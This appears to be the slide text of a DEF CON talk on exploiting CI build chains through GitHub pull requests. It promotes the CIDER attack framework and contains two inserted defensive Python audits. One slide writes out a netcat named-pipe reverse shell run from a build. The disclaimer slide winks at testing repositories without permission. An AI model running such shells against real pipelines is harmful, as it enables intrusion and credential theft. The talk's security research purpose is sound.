Exploiting Continuous Integration (CI) and Automated Build Systems
And introducing CIDER
DEF CON 25 talk transcript, posted 22-May-2020
Whoami
• SpaceB0x
• Sr. Security Engineer at LeanKit
• Application and network security (offense and defense)
• I like breaking into systems, building systems, and learning
• Security consultant
./agenda.sh
• Overview of Continuous Integration concepts
• Configuration Vulnerabilities vs. Application Vulnerabilities
• Real world exploit #1
• Common Bad-practices
• Real world exploit #2 – Attacking the CI provider
• Introduce CIDER
Continuous Integration
Continuous Integration (CI)
• Quick iterative release of code to production servers
• Usually many iterations per week or even per day
• Repository centric
• In sync with Automated Build
• For infrastructure / servers / subnets etc.
Microservices
• Breaking down a large app into small decoupled components
• These components interact with each other
• Eliminates single points of failure
• Autonomous development
Security Implications
• Good - Frequent release cycles are fabulous!
• Good - Faster code deployments = quick remediation
• Good - Decoupled systems reduce single points of failure
• Good - Compromise of one service doesn't (always) mean full pwnage
• Bad - Fast release sometimes means hasty oversights
• Bad – Automated deployment systems are checked less than the code that they deploy
Tools
Build Systems
• Take code and build conditionally
• Typically in a quasi-containerized type of environment
• Both local and cloud based are popular
• Vendors:
  ◦ Travis-CI
  ◦ Circle-CI
  ◦ Drone
  ◦ TeamCity
  ◦ BuildKite
Deployment Systems
• Deploy the code after build
• Heading more and more toward container driven
• Vendors:
  ◦ Jenkins
  ◦ Octopus Deploy
  ◦ Kubernetes
  ◦ Rancher
  ◦ Mesosphere
Chains of Deployment
Checks in the SDLC
• Build test before merges
• Web-hooks trigger specific actions based on conditions
• Services configured without regard to one another
Configuration Problems
GitHub – Huge attack surface
• Pull requests and commits trigger builds
• Build configurations normally in root of repo
• Thus a build config change can be part of a PR or commit
• Gain control of multiple systems through pull requests
Vulnerabilities are in Misconfiguration
• Creative configuration exploitation
• Vuln stacking at its finest
• Each individual service may be functioning exactly as intended
• Interaction between services is where many vulnerabilities lie
External Repos
• Most volatile attack surface
• Public repositories which map to internal build services
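The slides above make the point that the build config lives in the repo root, so a pull request (including one from an external fork) can rewrite how the build service runs. The following is an added defender-side example, not code from the talk or from the CIDER project: it gates a PR on whether it touches a known build-config path. It assumes a PR is represented by the fork flag and changed-file list a GitHub pull_request webhook delivers; the PR records at the bottom are constructed samples.

```python
"""Gate pull requests that change build configuration.

Added example, not the talk's or CIDER's code. A PR is a dict with the
'from_fork' flag and 'files' list a pull_request webhook carries.
"""
import fnmatch

# Root-of-repo build configs for the vendors named in the talk. A PR that
# edits one of these changes how the build service runs, not just what it builds.
CI_CONFIG_PATTERNS = (
    ".travis.yml", ".circleci/*", ".drone.yml",
    "Jenkinsfile", ".buildkite/*", ".teamcity/*",
)


def ci_config_changes(changed_files):
    """Return the changed paths that match a known build-config location."""
    return sorted(p for p in changed_files
                  if any(fnmatch.fnmatch(p, pat) for pat in CI_CONFIG_PATTERNS))


def assess_pull_request(pr):
    """Decide whether a PR may be built automatically.

    'hold'   - an external fork rewrites the build config: do not run it unreviewed
    'review' - config change from a branch inside the repo: require explicit approval
    'build'  - no build-config change: normal automated build
    Returns (verdict, matching_paths).
    """
    hits = ci_config_changes(pr["files"])
    if not hits:
        return "build", []
    if pr["from_fork"]:
        return "hold", hits
    return "review", hits


if __name__ == "__main__":
    sample_prs = [  # constructed sample webhook-like records
        {"number": 41, "from_fork": True,  "files": [".travis.yml", "src/app.js"]},
        {"number": 42, "from_fork": False, "files": ["Jenkinsfile"]},
        {"number": 43, "from_fork": True,  "files": ["README.md"]},
    ]
    for pr in sample_prs:
        verdict, hits = assess_pull_request(pr)
        print(f"PR #{pr['number']}: {verdict} {hits}")
```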
Real World Hax #1
# build side: named-pipe reverse shell run by the build
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc x.x.x.x 4444 1>/tmp/backpipe
# listener side
nc -l 4444
root
Bad-Practices / Worst-Practices
Environment Vars
• Being used to store credentials
• Storing metadata for other services within micro-service infrastructure
Run everything as root
• Just a container, right guyz?
• You now have internal network access
• Full control to build / augment the image
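The two slides above name credentials in plaintext environment variables and root builds as the worst practices. As an added example (not the talk's or CIDER's code), here is a small line-based audit that flags both in a build config, so it works on Travis or Drone style YAML and on Jenkinsfile text without a YAML parser; SAMPLE_CONFIG is a constructed Travis-style file, not a real project's.

```python
"""Audit a build config for plaintext credentials and root build steps.

Added example, not the talk's or CIDER's code. Checks are line based.
"""
import re

# NAME=value or NAME: value where NAME looks like a credential.
CREDENTIAL = re.compile(
    r"\b\w*(PASS(WORD)?|SECRET|TOKEN|API_?KEY)\w*\s*[=:]\s*(?P<value>\S+)", re.I)
ROOT_HINTS = (
    re.compile(r"^\s*sudo:\s*(required|true)\s*$", re.I),   # Travis sudo-enabled VM
    re.compile(r"^\s*-?\s*user:\s*root\s*$", re.I),         # container step as root
    re.compile(r"^\s*-?\s*sudo\s", re.I),                   # explicit sudo in a step
)


def audit_build_config(text):
    """Return (line_no, issue) findings for the config text."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = CREDENTIAL.search(line)
        # A value starting with '$' references a variable injected by the CI
        # service at build time, which is the pattern to prefer over a literal.
        if m and not m.group("value").startswith("$"):
            findings.append((no, "plaintext credential in environment"))
        if any(r.search(line) for r in ROOT_HINTS):
            findings.append((no, "build step runs as root"))
    return findings


SAMPLE_CONFIG = """\
language: node_js
env:
  - DEPLOY_TOKEN=gh0st-1234
  - DB_PASSWORD=$DB_PASSWORD
sudo: required
script:
  - sudo npm install -g some-tool
  - npm test
"""

if __name__ == "__main__":
    for no, issue in audit_build_config(SAMPLE_CONFIG):
        print(f"line {no}: {issue}")
```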
CI Provider Infoleak
• Problems with the CI Providers themselves
• Leak SSH keys, etc. which can compromise other customers on the host
• CI providers have at least some permissions to GitHub repos
• Cloud based CI providers have a hosting environment
• Speaking of which…
RealWorldHax #2
Introducing CIDER
What is CIDER?
• Continuous Integration and Deployment ExploiteR
• Framework for exploiting and attacking CI build chains
• Mainly leverages GitHub as attack surface to get to build services
• Takes the mess out of forking, PR-ing, callbacking
• It will poison a handful of build services and "exploits" for each one
Why CIDER?
• Fun
• Make attacking easy
• Awareness
• Rotten Apple by @claudijd
• Facilitate further research
CIDER overview
CIDER – 'help'
CIDER – 'add target' & 'list targets'
CIDER – 'load' and 'info'
CIDER features
• Node.JS
• Built modularly
• Can handle bulk lists of target repos
• Cleanup for GitHub repo craziness
• Ngrok – because port forwarding and public IPs suck
Ngrok
Disclaimer
• It is against the GitHub user agreement to test against a repository, even if you have permission from the owner of the repo
• You must be the owner to test a repo
• When testing ask them to make you an owner
WINK WINK
DEMO
Limitations
• Build Queues
• GitHub Noise
• Timeouts
• Repo API request throttling
Just the beginning…
• More CI-Frameworks
• Start tackling deployment services
• Start exploring other entry points
• Other code repositories
• ChatOps (Slack)
Thanks
• LeanKit Operations Team
• Evan Snapp
• @claudijd
Fin
CIDER on GitHub: https://github.com/spaceB0x/cider
Twitter: @spaceB0xx
www.untamedtheory.com